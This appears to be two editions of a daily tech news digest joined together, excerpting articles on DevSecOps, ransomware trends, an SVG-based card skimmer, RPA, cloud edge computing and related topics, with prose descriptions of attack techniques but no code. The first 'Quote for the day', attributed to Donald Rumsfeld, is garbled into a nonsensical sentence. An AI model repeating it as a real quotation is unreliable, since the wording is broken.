Security testing should be integrated throughout Application Delivery Pipelines, from design to deployment. Techniques such as automated vulnerability scanning, penetration testing, continuous monitoring, and many others are essential. By embedding compliance and risk assessment tasks into underlying change management processes, IT professionals can ensure that security testing is at the core of everything they do. Incorporating these strategies at the application component level ensures alignment with business needs to effectively prioritize results, identify attacks, and mitigate risks before they impact the network and infrastructure. ... To build a security-first mindset, organizations must embed security best practices into their culture and workflows. If new IT professionals coming into an organization are taught that security-first isn’t a buzzword, but instead the way the organization operates, it becomes company culture. Making security an integral part of the application delivery pipelines ensures that security policies and processes align with business goals. Education and communication are key—security teams must work closely with developers to ensure that security requirements are understood and valued. 


TSA biometrics program is evolving faster than critics’ perceptions

Privacy impact assessments (PIAs) are not only carried out for each new or changed process, but also published and enforced. The images of U.S. citizens captured by the TSA may be evaluated and used for testing, but they are deleted within 12 hours. Travelers have the choice of opting out of biometric identity verification, in which case they go through a manual ID check, just like decades ago. As happened previously with body scanners, TSA has adapted the signage it uses to notify the public about its use of biometrics. Airports where TSA uses biometrics now have signs that state in bold letters that participation is optional, explain how it works and include QR codes for additional information. The technology is also highly accurate, with tests showing 99.97% accurate verifications. In the cases which do not match, the traveler must then go through the same manual procedure used previously and also in cases where people opt out. TSA does not use biometrics to match people against mugshots from local police departments, for deportations or surveillance. In contrast, the proliferation of CCTV cameras observing people on their way to the airport and back home is not mentioned by Senator Merkley.


Blockchain: Redefining property transactions and ownership

Blockchain’s core strength lies in its ability to create a secure, immutable ledger of transactions. In the real estate context, this means that all details related to a property transaction— from the initial agreement to the final transfer of ownership—are recorded in a way that cannot be altered or tampered with. Blockchain technology empowers brokers to streamline transactions and enhance transparency, allowing them to focus on offering personalised insights and strategic advice. This shift enables brokers to provide a more efficient and cost-effective service while maintaining their advisory role in the real estate process. Another innovative application of blockchain in real estate is through smart contracts. These are digital contracts that automatically execute when certain conditions are met, ensuring that the terms of an agreement are fulfilled without the need for manual oversight. In real estate, smart contracts can be used to automate everything from title transfers to escrow arrangements. This automation not only speeds up the process but also reduces the chances of disputes, as all terms are clearly defined and executed by the technology itself. Beyond improving the efficiency of transactions, blockchain also has the potential to change how we think about property ownership. 


Agile Reinvented: A Look Into the Future

There’s no denying that agile is poised at a pivotal juncture, especially given the advent of AI. While no one knows how AI will influence agile in the long term, it is already shaping how agile teams are structured and how its members approach their work, including using AI tools to code or write user stories and jobs to be done. To remain relevant and impactful, agile must be responsive to the evolving needs of the workforce. Younger developers, in particular, seek more room for creativity. New approaches to agile team formation—including Team and Org Topologies or FaST, which relies on elements of dynamic reteaming instead of fixed team structures to tackle complex work—are emerging to create space for innovation. Since agile was built upon the values of putting people first and adapting to change, it can, and should, continue to empower teams to drive innovation within their organizations. This is the heart of modern agile: not blindly adhering to a set of rules but embracing and adapting its principles to your team’s unique circumstances. As agile continues to evolve, we can expect to see it applied in even more varied and innovative ways. For example, it already intersects with other methodologies like DevSecOps and Lean to form more comprehensive frameworks. 


Breaking Free from Ransomware: Securing Your CI/CD Against RaaS

By embracing a proactive DevSecOps mindset, we can repel RaaS attacks and safeguard our code. Here’s your toolkit: ... Don’t wait until deployment to tighten the screws. Integrate security throughout the software development life cycle (SDLC). Leverage software composition analysis (SCA) and software bill of materials (SBOM) creation, helping you scrutinize dependencies for vulnerabilities and maintain a transparent record of every software component in your pipeline. ... Your pipelines aren’t static entities; they are living ecosystems demanding constant Leveraging tools to implement continuous monitoring and logging of pipeline activity. Look for anomalies, suspicious behaviors and unauthorized access attempts. Think of it as having a cybersecurity hawk perpetually circling your pipelines, detecting threats before they take root. ... Minimize unnecessary access to your CI/CD environment. Enforce strict role-based access controls and least privilege Utilize access control tools to manage user roles and permissions tightly, ensuring only authorized users can interact with sensitive resources. Remember, the 2022 GitHub vulnerability exposed the dangers of lax access control in CI/CD environments.


Achieving cloudops excellence

Although there are no hard-and-fast rules regarding how much to spend on cloudops as a proportion of the cost of building or migrating applications, I have a few rules of thumb. Typically, enterprises should spend 30% to 40% of their total cloud computing budget on cloud operations and management. This covers monitoring, security, optimization, and ongoing management of cloud resources. ... Cloudops requires a new skill set. Continuous training and development programs that focus on operational best practices are vital. This transforms the IT workforce from traditional system administrators to cloud operations specialists who are adept at leveraging cloud environments’ nuances for efficiency. Beyond technical implementations, enterprise leaders must cultivate a culture that prioritizes operational readiness as much as innovation. The essential components are clear communication channels, cross-departmental collaboration, and well-defined roles. Organizational coherence enables firms to pivot and adapt swiftly to the changing tides of technology and market demands. It’s also crucial to measure success by deployment achievements and ongoing performance metrics. By setting clear operational KPIs from the outset, companies ensure that cloud environments are continuously aligned with business objectives. 


What high-performance IT teams look like today — and how to build one

“Today’s high-performing teams are hybrid, dynamic, and autonomous,” says Ross Meyercord, CEO of Propel Software. “CIOs need to create a clear vision and articulate and model the organization’s values to drive alignment and culture.” High-performance teams are self-organizing and want significant autonomy in prioritizing work, solving problems, and leveraging technology platforms. But most enterprises can’t operate like young startups with complete autonomy handed over to devops and data science teams. CIOs should articulate a technology vision that includes agile principles around self-organization and other non-negotiables around security, data governance, reporting, deployment readiness, and other compliance areas. ... High-performance teams are often involved in leading digital transformation initiatives where conflicts around priorities and solutions among team members and stakeholders can arise. These conflicts can turn into heated debates, and CIOs sometimes have to step in to help manage challenging people issues. “When a CIO observes misaligned goals or intra-IT conflict, they need to step in immediately to prevent organizational scar tissue from forming,” says Meyercord of Propel Software. 



Quote for the day:

"Don't necessarily and sharp edges. Occasionally they are necessary to leadership." -- Donald Rumsfeld

Daily Tech Digest - December 06, 2020

Ransomware Set for Evolution in Attack Capabilities in 2021

“The Maginot line of cybersecurity transformation failed as the first adopters were the e-crime groups and cybercrime cartels, and we just have to pay attention now as perimeter defenses have failed and continue to fail, and visibility and hardening has become an extreme challenge. Most attacks you see today are attacks from the inside out – digital insiders using trusted ecosystems to leverage ransomware attacks and espionage and crime campaigns.” Looking at ransomware in particular, the trio said they do not see this stopping or slowing down “and we continue to predict that this is going to extend significantly,” Foss said. He claimed ransomware groups have brought more people into their groups and are making sure they are getting trusted people, with nation state adversaries taking part as well. “We see this reaching out to additional operating systems; traditionally this has only impacted Windows primarily, but with MacOS having such a market reach in the professional ecosystem of most organizations, we predict it will be targeted as well,” Foss said. “Linux is one we have started to see more campaigns begin to target, and a lot are looking at defacing webpages in addition to taking over core components of ecosystems that these companies operate.”


Rethinking Robotic Process Automation (RPA)

You can't converse much with anyone these days about automation without talking RPA. It seems the little bots are getting everywhere. It's almost like an alien invasion! But always, the talk seems to be about creating and imposing bots on us. A bot for this and a bot for that, pretty soon you have dozens of little creatures (think about all the little gremlins in the film of the same name!) all nibbling away at pieces of your work. Helpful they maybe, but at what cost? In the UK and USA, as we came out of the 2008 financial crisis, economists were left scratching their heads. They were wrestling with what they call the productivity puzzle. Historically economic growth was always been closely tied to productivity, e.g., if output per worker does not grow, then the economy does not grow. In the UK, productivity was actually lower than before the crisis hit. So if productivity growth is required, it only stands to reason that tools to increase productivity are a useful thing to have. (I know I am oversimplifying, but I think it works for where we are going). What if RPA, instead of being about Robotic Process Automation instead became about Robotic Process Assistants. In this new world, we would each have just one robot on our desktop/laptop/machine, a little like Automator on a Mac.


Quantum Sensors Will Revolutionise The Tech Industry

Measurement devices that exploit quantum properties have been around for a while, such as atomic clocks, laser distance meters, and magnetic resonance imaging used for medical diagnosis. What can now be considered new is that individual quantum systems, like atoms and photons, are increasingly used as measurement probes. The entanglement and manipulation of quantum states are used to improve the sensitivity, even beyond the limit set by a conventional formulation of the quantum mechanical uncertainty principle. Yet, many scientists believe that quantum will enjoy its first real commercial success in sensing. That’s because sensing can avail the very characteristic that makes building a quantum computer so difficult-the extraordinary sensitivity of quantum states to the environment. Whether they respond to the gravitational pull of buried objects or picking up magnetic fields from the human brain, quantum sensors can recognize a wide range of tiny signals across the world. Some physicists believe that gravity-measuring quantum sensors, in particular, will become more widespread quickly with a potential market of USD 1 billion a year.


Banking to groceries — Data Protection Authority has multi-sector role, but must be efficient

First, the Data Protection Authority should follow a risk-based approach that is implicitly present in the Bill. For example, in many places, the Bill requires the DPA to consider the risk of harm to consumers while framing regulations. Additionally, the Bill categorises data into personal data, sensitive personal data, and critical personal data to differentiate the varying levels of risks that emanate from the misuse of data. Finally, the Bill creates a differential level of regulation between ordinary firms that use data, significant data fiduciaries, and small entities. These point to the fact that risk-based regulation must be inherent to the DPA’s strategic approach. Within this overall framework, the DPA can prioritise its resources by focusing on processing sensitive and critical personal data, and by overseeing significant data fiduciaries. This will allow the DPA to first build capacity in areas that pose the greatest threat to consumers, rather than expending its limited resources to regulate all sectors of economic activity. The DPA can further sharpen its focus by having a low threshold for exempting small entities. This will allow the DPA to focus its regulatory capacity towards firms that pose a larger risk to consumers by collecting and processing large volumes of data.


Australia’s Global RegTech Hub Poised for Growth

Like most businesses, local RegTechs have experienced disruption during the COVID-19 pandemic. The biggest challenge has been an immediate reduction in revenue. A contributing factor is the slowing of export opportunities, following travel restrictions and the postponement of trade events. Nonetheless, Australian RegTechs remain positive about future growth and continue to seek growth capital to fund product development, talent acquisition and market expansion. The pandemic has accelerated a shift towards remote working and digital interactions, increasing the risk of fraud and financial crime, and focusing organisations on the importance of robust cybersecurity. At the same time, Federal and State Governments are recognising the potential of RegTech to efficiently and effectively solve regulatory and compliance challenges, and to become a signature export for Australia. This, combined with regulatory pressure for all regulated entities across a range of industries to adopt RegTech, will create a strong platform for the sector to excel. ... Collectively, these actions will help Australian RegTechs to scale, creating local jobs, and supporting the export of Australian solutions.


Novel Online Shopping Malware Hides in Social-Media Buttons

The imposter buttons look just like the legitimate social-sharing buttons found on untold numbers of websites, and are unlikely to trigger any concern from website visitors, according to Sansec. Perhaps more interestingly, the malware’s operators also took great pains to make the code itself for the buttons to look as normal and harmless as possible, to avoid being flagged by security solutions. “While skimmers have added their malicious payload to benign files like images in the past, this is the first time that malicious code has been constructed as a perfectly valid image,” according to Sansec’s recent posting. “The malicious payload assumes the form of an html <svg> element, using the <path> element as a container for the payload. The payload itself is concealed utilizing syntax that strongly resembles correct use of the <svg> element.” To complete the illusion of the image being benign, the malicious payloads are named after legitimate companies. The researchers found at least six major names being used for the payloads to lend legitimacy: facebook_full; google_full; instagram_full; pinterest_full; twitter_full; and youtube_full. The result of all of this is that security scanners can no longer find malware just by testing for valid syntax.


Embedding Trust at the Core of Critical Infrastructure

Technology is no longer an extension of critical infrastructure, but rather at the core of it. The network sits between critical data, assets, and systems, and the users and services that leverage or operate them. It is uniquely positioned not only to add essential visibility and controls for resiliency, but also a well-placed and high-value target for attackers. Resiliency of the network infrastructure itself is crucial. Resilience is only achieved by building in steps to verify integrity with technical features embedded in hardware and software. Secure boot ensures a network device boots using only software that is trusted by the Original Equipment Manufacturer. Image signing allows a user to add a digital fingerprint to an image to verify that the software running on the network has not been modified. Runtime defenses protect against the injection of malicious code into running network software, making it very difficult for attackers to exploit known vulnerabilities in software and hardware configurations. Equally important, vendors must use a Secure Development Lifecycle to enhance security, reduce vulnerabilities, and promote consistent security policy across solutions. All of this might sound like geek mumbo-jumbo, but these are non-negotiables in today’s world. 


Out on the edge: The new cloud battleground isn’t in the cloud at all

The big cloud providers are all pursuing similar paths to the edge, anchored by the on-premises versions of their cloud infrastructure that have started rolling out this year. AWS’ Outposts, which was built for use within customer data centers, is also the foundation for AWS Local Zones and AWS Wavelength, which are miniature versions of the cloud giant’s technology stack that live in small, local data centers and telecommunications carriers’ point-of-presence facilities. The company says the experience it gained building out its retail e-commerce business lends itself perfectly to edge computing. “We already have more IoT devices connected to the cloud than any other cloud provider by a large margin. We have to do that for ourselves,” ‘said AWS’ Vass. Customers can employ such Amazon inventions as AWS Greengrass for IoT devices, AWS Snowball for storage and AWS Robomaker for development of robotic devices using Lambda serverless functions “on a POP, in a Local Zone and in the cloud, manage it all centrally and do decentralized execution,” he said. Microsoft’s Azure cloud edge strategy uses a similar approach. Edge Zones, which the company rolled out early this year, are essentially scaled-down Azure data centers located within miles of a customer. 


Is RPA the same as AI? What’s the Difference, and What Are the Use Cases?

RPA uses software robots to automate human actions in business processes that involve interaction with digital systems. These actions are usually simple and repetitive, which makes them prone to human error and can provoke a loss of employees’ motivation and efficiency. Software robots and RPA on the other hand bring notable benefits: accuracy (by minimizing human error), reliability (by being always available and by reducing delay), traceability (by providing audit trails and logs), and productivity (by increasing processing speed). A few examples of use cases are automating orders, processing payroll, customer onboarding, data validation, etc. ... Artificial intelligence “combines the human capacities for learning, perception, and interaction [...] at a level of complexity [and automation] that ultimately supersedes our own abilities.” It is a spectrum of technologies (e.g., natural language processing, computer vision, predictive modeling, data clustering, and many more) that opens new use cases for businesses, as well as reduces entry cost for many existing business problems that still require too much human intervention. ... In order to tackle these use cases and leverage the benefits of AI in business, using a data science and machine learning platform is a best practice. — it is the key to successfully scaling AI projects and to bringing a robust data methodology to all levels of the business.


When Is It Time to Retire Your Legacy System and Go Cloud?

When your tried-and-tested technology becomes unwieldy and impacts your bottom line, upgrading is critical to fit the business. Let's say you're a construction company that uses an obsolete legacy proof-of-delivery (PoD) system. The system requires three full-time customer service specialists to manage the application (e.g., find the right documents, send them over to customers, work with invoices, and so on). Due to the use of old-school tech, making a single change or adding a new feature is costly and time-consuming. On the other hand, the risk of human error is high and can result in unhappy customers, overheads, and delayed payments. Furthermore, customers call you to request their PoD, and the number of monthly calls now exceeds 1,000 and requires a lot of manual labor. This is a telltale sign that your traditional processes aren't effective which badly affects your entire business. Creating a Cloud-based and easy-to-use PoD portal would ensure maximum automation of all relevant processes, elimination of customer calls or their reduction to the minimum, and significant time- and cost-saving and increased efficiency.



Quote for the day:

"Anger and intolerance are the enemies of correct understanding." -- Mahatma Gandhi